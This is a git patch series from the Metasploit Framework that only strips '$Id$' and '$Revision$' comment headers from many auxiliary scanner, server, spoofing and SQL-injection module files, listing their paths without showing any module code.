-1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index e2beb0247f..9cbd153e75 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index ae403685ce..d653e3d2dc 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 3a3b2c0889..39a0933af3 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index 3de1c52f95..8de1d29e61 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 084be064b5..f6ad93fdc9 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 7f57f34724..71f16a6870 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index d8d9dbc8c9..e5c3947332 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index d0b583a549..3e91a5e365 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4a4dcc6b1..12f0c70422 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 5c516f9282..deaaa15ddc 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index c93865bb3d..5ffd8f7914 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index a271b64563..a30f5951a0 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index c448b42865..dba6669df5 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 822108e56c..2952aa8903 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index c514d5e873..86b5f23284 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 37600f2a6f..8a0e4013b6 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 7111cbc4a7..764bdfe52c 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index d7ebca54e0..888768c917 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 0ddd78c71f..105671aef7 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 577b87e541..af593b2078 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index bb708d6b18..8b6cd7d103 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index 143735d23e..9eaaf114f0 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 8d1f7229b9..7f112a5c60 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 4e18eb4a6b..e8cb80d419 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 2f97f897eb..425fd4fffc 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 3e459175cb..1e2a1c47e3 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/pxexploit.rb b/modules/auxiliary/server/pxexploit.rb index 4ed4ca7aa8..2738ec87e3 100644 --- a/modules/auxiliary/server/pxexploit.rb +++ b/modules/auxiliary/server/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 4d8fdeb902..fc3cef45f2 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index de5891fd53..c232a18e61 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index f95dd7d4d4..bcd3a60d56 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index d7c1f7e69f..cd70e067f8 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index eebcd8643d..8274192725 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 7fad7e6731..9e31a616bf 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 588495ce74..7fe4033eb6 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index e5a842abde..0a25854f58 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index df60299919..063eaf68b4 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - require 'msf/core' require 'net/dns' require 'resolv' diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index a61385da27..897eb0c293 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 1ac2c4a7c7..3417e20bb1 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index 5b3541b49c..6a62b8bff6 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index 915d5dc5ae..a61291eb3b 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb index 3fbc7ca8f4..8c91fc4df2 100644 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ b/modules/auxiliary/spoof/wifi/dnspwn.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 78cfb20f14..e2e0f79ca2 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index eadbff66b5..49d656f22c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index e4518a2e93..99e9098329 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 982cf8a00e..118ef12511 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index 2327ed1aed..7bb261541d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 81380d3a72..2636a28b18 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index 585e9540a2..de976eb858 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index 10a708726e..948c6ba9c2 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 171b57a99d..1df9782e12 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 3c230cca7d..4b21d8b2fc 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 0aed4857b6..9707dfa236 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 8de44140c3..27ad1da422 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 1de25f1a6c..a36eb94d08 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 061e42beef..7f04f0c26f 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index 917851d2dd..d8c7611edd 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 89cf84c236..96eb296acc 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index adc18b0953..3af668a06d 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 9b0f8823b2..c751749aab 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # # This file is part of the Metasploit Framework and may be subject to diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 2648670df7..b97daf1694 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index 8107c615b4..761f90185b 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 7126189bb4..f917092d62 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit From 95948b9d7c07dbc87a78003bde106db623f63424 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 3 Jan 2013 00:58:08 +0100 Subject: [PATCH 133/154] msftidy: remove $Revision$ --- modules/auxiliary/admin/2wire/xslt_password_reset.rb | 1 - modules/auxiliary/admin/backupexec/dump.rb | 1 - modules/auxiliary/admin/backupexec/registry.rb | 1 - modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb | 1 - modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb | 1 - modules/auxiliary/admin/db2/db2rcmd.rb | 1 - modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb | 1 - modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb | 1 - modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb | 1 - modules/auxiliary/admin/http/contentkeeper_fileaccess.rb | 1 - modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb | 1 - modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb | 1 - modules/auxiliary/admin/http/tomcat_administration.rb | 1 - modules/auxiliary/admin/http/tomcat_utf8_traversal.rb | 1 - modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb | 1 - modules/auxiliary/admin/http/typo3_sa_2009_001.rb | 1 - modules/auxiliary/admin/http/typo3_sa_2009_002.rb | 1 - modules/auxiliary/admin/http/typo3_sa_2010_020.rb | 1 - .../auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb | 1 - modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb | 1 - modules/auxiliary/admin/motorola/wr850g_cred.rb | 1 - modules/auxiliary/admin/ms/ms08_059_his2006.rb | 1 - modules/auxiliary/admin/mssql/mssql_exec.rb | 1 - modules/auxiliary/admin/mssql/mssql_idf.rb | 1 - modules/auxiliary/admin/mssql/mssql_sql.rb | 1 - modules/auxiliary/admin/mysql/mysql_enum.rb | 1 - modules/auxiliary/admin/officescan/tmlisten_traversal.rb | 1 - modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb | 1 - modules/auxiliary/admin/oracle/oracle_login.rb | 1 - modules/auxiliary/admin/oracle/oracle_sql.rb | 1 - modules/auxiliary/admin/oracle/osb_execqr.rb | 1 - modules/auxiliary/admin/oracle/osb_execqr2.rb | 1 - modules/auxiliary/admin/oracle/osb_execqr3.rb | 1 - modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb | 1 - modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb | 1 - modules/auxiliary/admin/oracle/sid_brute.rb | 1 - modules/auxiliary/admin/oracle/tnscmd.rb | 1 - modules/auxiliary/admin/pop2/uw_fileretrieval.rb | 1 - modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb | 1 - modules/auxiliary/admin/scada/igss_exec_17.rb | 1 - modules/auxiliary/admin/scada/modicon_command.rb | 1 - modules/auxiliary/admin/scada/modicon_password_recovery.rb | 1 - modules/auxiliary/admin/scada/modicon_stux_transfer.rb | 1 - modules/auxiliary/admin/scada/multi_cip_command.rb | 1 - modules/auxiliary/admin/serverprotect/file.rb | 1 - modules/auxiliary/admin/smb/check_dir_file.rb | 1 - modules/auxiliary/admin/smb/list_directory.rb | 1 - modules/auxiliary/admin/smb/samba_symlink_traversal.rb | 1 - modules/auxiliary/admin/smb/upload_file.rb | 1 - modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 1 - modules/auxiliary/admin/tikiwiki/tikidblib.rb | 1 - modules/auxiliary/admin/vnc/realvnc_41_bypass.rb | 1 - .../auxiliary/admin/vxworks/apple_airport_extreme_password.rb | 1 - 